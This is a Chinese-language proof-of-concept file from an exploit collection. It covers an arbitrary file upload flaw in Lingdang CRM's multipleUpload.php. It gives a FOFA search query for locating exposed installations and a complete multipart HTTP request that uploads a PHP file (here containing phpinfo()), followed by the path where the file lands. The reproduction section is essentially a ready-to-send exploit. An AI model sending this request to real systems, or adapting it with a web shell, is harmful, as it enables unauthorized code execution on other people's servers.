POC/wpoc/北京灵当互动信息技术有限公司/灵当crmmultipleUpload存在任意文件上传漏洞.md
eeeeeeeeee-code 06c8413e64 first commit
2025-03-04 23:12:57 +08:00

48 lines
2.0 KiB
Markdown
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

# 灵当crm multipleUpload存在任意文件上传漏洞
# 一、漏洞简介
<font style="color:rgb(51, 51, 51);">灵当CRMCustomer Relationship Management客户关系管理是一款面向中小企业的客户关系管理软件旨在帮助企业更好地管理客户信息、销售流程、市场营销和服务支持等方面的工作。灵当CRM提供了一系列工具和功能帮助企业在销售、市场和服务部门之间实现高效协作提高客户满意度和业务效率。灵当crm multipleUpload.php处存在任意文件上传漏洞。</font>
# 二、影响版本
+ 灵当crm
# 三、资产测绘
+ fofa`body="[http://localhost:8088/crm/index.php"](http://localhost:8088/crm/index.php") && body="ldcrm.base.js"`
+ 特征
![1722999861305-1e9e41ad-ed6a-4750-918d-61a0631ad06a.png](./img/n_rB39my7VHUQaTD/1722999861305-1e9e41ad-ed6a-4750-918d-61a0631ad06a-180620.png)
# 四、漏洞复现
```java
POST /crm/modules/Home/multipleUpload.php?uploadtype=uploadimg HTTP/1.1
Host:
Content-Length: 779
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary0Mh3BfgWszxRFokh
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
------WebKitFormBoundary0Mh3BfgWszxRFokh
Content-Disposition: form-data; name="file"; filename="budong.php"
Content-Type: text/plain
<?phpinfo();?>
------WebKitFormBoundary0Mh3BfgWszxRFokh
Content-Disposition: form-data; name="error"
UPLOAD_ERR_OK
------WebKitFormBoundary0Mh3BfgWszxRFokh--
```
![1726733803836-2941958f-c112-40e2-a412-85a7277323f6.png](./img/n_rB39my7VHUQaTD/1726733803836-2941958f-c112-40e2-a412-85a7277323f6-953406.png)
上传路径
```java
crm/storage/2024/September/week3/budong.php
```
![1726733845670-f34ac442-40c8-4647-af5c-c0cab59d4d83.png](./img/n_rB39my7VHUQaTD/1726733845670-f34ac442-40c8-4647-af5c-c0cab59d4d83-617707.png)
> 更新: 2024-10-21 11:49:37
> 原文: <https://www.yuque.com/xiaokp7/ocvun2/nlhbtvcu71urmozp>